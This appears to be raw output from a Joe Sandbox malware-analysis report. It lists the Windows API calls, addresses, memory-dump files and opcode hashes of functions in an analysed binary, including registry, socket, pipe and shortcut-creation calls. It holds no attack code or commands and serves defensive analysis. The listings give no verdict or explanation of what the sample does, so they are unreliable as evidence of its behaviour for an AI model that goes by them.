                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a80678307436c328f808a15e4002aecc2166165b6e27d5c0a23aa30c4f5a2b15
                                                                                                                                                                                                                                                                                    • Instruction ID: c5d0ba96a9d8b0362c57f52b11c6683c28f7d39e7b08f5bee6ebed15efb5d756
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a80678307436c328f808a15e4002aecc2166165b6e27d5c0a23aa30c4f5a2b15
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81313C31704255AFDB21CF48DC89F6437E1FB86B50F1541A4F6698B2B1CBB1AD84EB01
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B480D0
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B480F6
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B480F9
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B48117
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B48120
                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B48145
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B48153
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1f79f02869cd6da3c490eaedae4703ce5e3fb318f28c0f93fd8bf5d9ba0a5a75
                                                                                                                                                                                                                                                                                    • Instruction ID: 086919092682bc2e9dc091c844063dbb6f8631a27fc3fe7a32a8e93aa46765eb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f79f02869cd6da3c490eaedae4703ce5e3fb318f28c0f93fd8bf5d9ba0a5a75
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6219772600219AFDF10DFA8CC84DBE77ECEF093607048466F915EB290DA70DD869760
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B481A9
                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B481CF
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00B481D2
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32 ref: 00B481F3
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00B481FC
                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00B48216
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00B48224
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9cf5ebc3d6c22a8b25e43d03f6ad9eedc3cdb60d9ab9e157d6cf13697d154f3c
                                                                                                                                                                                                                                                                                    • Instruction ID: b49c5637ff28d83640ef4a5db96c16813bd9e35f108d5e532027bb328a04bf2f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf5ebc3d6c22a8b25e43d03f6ad9eedc3cdb60d9ab9e157d6cf13697d154f3c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2521A135604604BFDB10AFA8DC88DAE77ECEF093607008165F905DB2A0DEB0ED81DB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00B50E99
                                                                                                                                                                                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B50ED5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                    • Opcode ID: 15cbeb96be7d5ae02d54a146278f195e6918bd71ba943f7f9026da6f4c7f1bf8
                                                                                                                                                                                                                                                                                    • Instruction ID: 12a02fe6cab15944e8563c2771c89d79c3147cac87fa9941aa1e8790d0a8ab24
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15cbeb96be7d5ae02d54a146278f195e6918bd71ba943f7f9026da6f4c7f1bf8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5215C7051430AABDB20AF24DC45B9A77F8EF54761F204AE9FCA5E72D0EB709845CB50
                                                                                                                                                                                                                                                                                    APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00B50F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B50FA8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 06ce6946756e17cdd35912c4b08d2966a6a856ac4f355dff677f3c18b76e5767
• Instruction ID: 889f8a40e5079a7c203b52cd8f92598426376b0bfb266a4a81b0770dfb4d0c7a
• Opcode Fuzzy Hash: 06ce6946756e17cdd35912c4b08d2966a6a856ac4f355dff677f3c18b76e5767
• Instruction Fuzzy Hash: DE219C31644345ABDB209F68CC04B9A77F8FF55762F240A99FCA1E32D0DB709888DB50
APIs
  • Part of subcall function 00AE7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AE78B1
  • Part of subcall function 00AE7873: GetStockObject.GDI32(00000011), ref: 00AE78C5
  • Part of subcall function 00AE7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AE78CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B74BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B74BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B74BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B74BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B74BE3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: f9426164a946a2104da2777ab8b41549488438f59dd75d8612710c123eda6a6d
• Instruction ID: 84a18aed89f7794617f398b437bb8239a51524f31c2378c934f70b28b70b66cb
• Opcode Fuzzy Hash: f9426164a946a2104da2777ab8b41549488438f59dd75d8612710c123eda6a6d
• Instruction Fuzzy Hash: C51193B1140219BEEF119F65CC85EEB7FADEF08798F018110B618A2160CB72DC619BA0
APIs
  • Part of subcall function 00B1DB23: _free.LIBCMT ref: 00B1DB4C
• _free.LIBCMT ref: 00B1DBAD
  • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
  • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
• _free.LIBCMT ref: 00B1DBB8
• _free.LIBCMT ref: 00B1DBC3
• _free.LIBCMT ref: 00B1DC17
• _free.LIBCMT ref: 00B1DC22
• _free.LIBCMT ref: 00B1DC2D
• _free.LIBCMT ref: 00B1DC38
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction ID: 777f34e0dc75cbcd9e4d70399914194c59848d48c4757ff1a8c3fe362d359794
• Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction Fuzzy Hash: FD1163B2546B04BAD520BBB0DC07FCB77DC9F04700FC10CE9B29AAA152DA75B6958750
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B4E328
• LoadStringW.USER32(00000000), ref: 00B4E32F
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B4E345
• LoadStringW.USER32(00000000), ref: 00B4E34C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B4E390
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00B4E36D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: bc7176139ee1e47df0e34afe9f5febd1ade45d1e751f9ed70978e67841acfc60
• Instruction ID: 5fd36e7c2c55a25326e0de0b78557ac25591ed504b1f5eaa04a8bfcb4a9d4787
• Opcode Fuzzy Hash: bc7176139ee1e47df0e34afe9f5febd1ade45d1e751f9ed70978e67841acfc60
• Instruction Fuzzy Hash: 94016DF29002087FE712ABA48D89EEA77BCEB08740F4045D5B74AE7041EA74DE849B75
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00B51322
• EnterCriticalSection.KERNEL32(00000000,?), ref: 00B51334
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00B51342
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B51350
• CloseHandle.KERNEL32(00000000), ref: 00B5135F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00B5136F
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00B51376
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 79a2dfbd64661dd16d22b107dcbb3082f0464df37a32a5831512af8e17ee628b
• Instruction ID: 1137f05b7a0fb7eb4d0de301c923fe73799236db956260304f746d1c3600bb6d
• Opcode Fuzzy Hash: 79a2dfbd64661dd16d22b107dcbb3082f0464df37a32a5831512af8e17ee628b
• Instruction Fuzzy Hash: E9F0C932042612FBD7411B54EE49BD6BB79FF04342F401561F10696CB18F7495A5CF94
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B6281D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B6283E
• WSAGetLastError.WSOCK32 ref: 00B6284F
• htons.WSOCK32(?,?,?,?,?), ref: 00B62938
• inet_ntoa.WSOCK32(?), ref: 00B628E9
  • Part of subcall function 00B4433E: _strlen.LIBCMT ref: 00B44348
  • Part of subcall function 00B63C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B5F669), ref: 00B63C9D
• _strlen.LIBCMT ref: 00B62992
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
• Opcode ID: d069dfb649a26639acb14727958207cf76d79daf6291ff36c811b08d8ded429a
• Instruction ID: 47c24b79282094e4598606e554e67427e568cec9f629ffba646438b37d4c7486
• Opcode Fuzzy Hash: d069dfb649a26639acb14727958207cf76d79daf6291ff36c811b08d8ded429a
• Instruction Fuzzy Hash: 30B1F031604740AFE324DF64C885E2ABBE5EF84318F54859CF45A4B2E2DB75EE42CB91
APIs
• __allrem.LIBCMT ref: 00B1042A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B10446
• __allrem.LIBCMT ref: 00B1045D
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1047B
• __allrem.LIBCMT ref: 00B10492
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B104B0
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction ID: 98b33914305f19252abc22d8ec1cbc7bdfe8e7d57bd9564f9a27f47f89918ea8
• Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
• Instruction Fuzzy Hash: DF81E871610709ABE720BF68DC81BEA73F9EF58320F6441AAF521D7681E7B0D9C08794
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B08649,00B08649,?,?,?,00B167C2,00000001,00000001,8BE85006), ref: 00B165CB
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B167C2,00000001,00000001,8BE85006,?,?,?), ref: 00B16651
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B1674B
• __freea.LIBCMT ref: 00B16758
  • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
• __freea.LIBCMT ref: 00B16761
• __freea.LIBCMT ref: 00B16786
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: c4a32ee2b633e06edbf01983b8c24de4b31a0ace5ba936d8c4c9bca88df836bf
• Instruction ID: c0184ff02287e8186650547ef30b6b40c8c0b1d8f1fca4e5c2e360de21430e2f
• Opcode Fuzzy Hash: c4a32ee2b633e06edbf01983b8c24de4b31a0ace5ba936d8c4c9bca88df836bf
• Instruction Fuzzy Hash: 3651EF72610216AFEB259F64CC85EFB77EAEB40754F9446A9FC18D6180EB34DC90C6A0
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B6C10E,?,?), ref: 00B6D415
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D451
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4C8
  • Part of subcall function 00B6D3F8: _wcslen.LIBCMT ref: 00B6D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6C72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B6C785
• RegCloseKey.ADVAPI32(00000000), ref: 00B6C7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B6C7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B6C853
• RegCloseKey.ADVAPI32(?), ref: 00B6C85F
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
• Opcode ID: d7b324341e0b131a4b091764efe7a9a7ef7455e97423d1d2d4ff16f9a63fd8d3
• Instruction ID: c564e38ba5d5827a76f4bf8af02ed60cb9eb7992f21803a1095c513d67b0877e
• Opcode Fuzzy Hash: d7b324341e0b131a4b091764efe7a9a7ef7455e97423d1d2d4ff16f9a63fd8d3
• Instruction Fuzzy Hash: C8819B31208241AFC714DF25C995E3ABBE5FF84308F1489ACF4994B2A2DB35ED45CB92
APIs
• VariantInit.OLEAUT32(00000035), ref: 00B400A9
• SysAllocString.OLEAUT32(00000000), ref: 00B40150
• VariantCopy.OLEAUT32(00B40354,00000000), ref: 00B40179
• VariantClear.OLEAUT32(00B40354), ref: 00B4019D
• VariantCopy.OLEAUT32(00B40354,00000000), ref: 00B401A1
• VariantClear.OLEAUT32(?), ref: 00B401AB
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
• Opcode ID: 743e2af5a76de2b33cda54d99cf550901a804d18147214d0e3e0c3d8511a9381
• Instruction ID: 6590bea609823be8431a461f580c7cb4a77a2f1442f7d2bd879f17a0e2f24aad
• Opcode Fuzzy Hash: 743e2af5a76de2b33cda54d99cf550901a804d18147214d0e3e0c3d8511a9381
• Instruction Fuzzy Hash: E151C731620314AACF20BB64D8C9B29B3F5EF45310F149486FA06EF2D6DBB09D44EB55
APIs
  • Part of subcall function 00AE41EA: _wcslen.LIBCMT ref: 00AE41EF
  • Part of subcall function 00AE8577: _wcslen.LIBCMT ref: 00AE858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 00B59F2A
• _wcslen.LIBCMT ref: 00B59F4B
• _wcslen.LIBCMT ref: 00B59F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 00B59FCA
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: c3d0c7171367f57311d16a21e60f3eacc2d30a791412e5b9756fa2c90796fe30
• Instruction ID: 827647b06a68a8ea626b72b9d214b4988c4581e9d5f2d19c6c5a12e3cdde457e
• Opcode Fuzzy Hash: c3d0c7171367f57311d16a21e60f3eacc2d30a791412e5b9756fa2c90796fe30
• Instruction Fuzzy Hash: FFE16F31504340DFD714EF25C981B6AB7E4EF84314F0489ADF8999B2A2DB71ED09CB92
APIs
• _wcslen.LIBCMT ref: 00B56F21
• CoInitialize.OLE32(00000000), ref: 00B5707E
• CoCreateInstance.OLE32(00B80CC4,00000000,00000001,00B80B34,?), ref: 00B57095
• CoUninitialize.OLE32 ref: 00B57319
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                    • Opcode ID: aff22dd72f6317dff954a97c645e7ee2f063fccc8cd2863e4d62d3b52456c357
                                                                                                                                                                                                                                                                                    • Instruction ID: e0b2fa4a80fef11d91f45b3a9e36896ea2cd17bf5c2b685f55b70384edc569da
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aff22dd72f6317dff954a97c645e7ee2f063fccc8cd2863e4d62d3b52456c357
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3D14A71608241AFC300EF25C881A6BB7E8EF94744F4449ADF5958B2A2DB71E949CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00AE1B35
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AE1B99
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AE1BB6
                                                                                                                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AE1BC7
                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00AE1C15
                                                                                                                                                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B23287
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE1C2D: BeginPath.GDI32(00000000), ref: 00AE1C4B
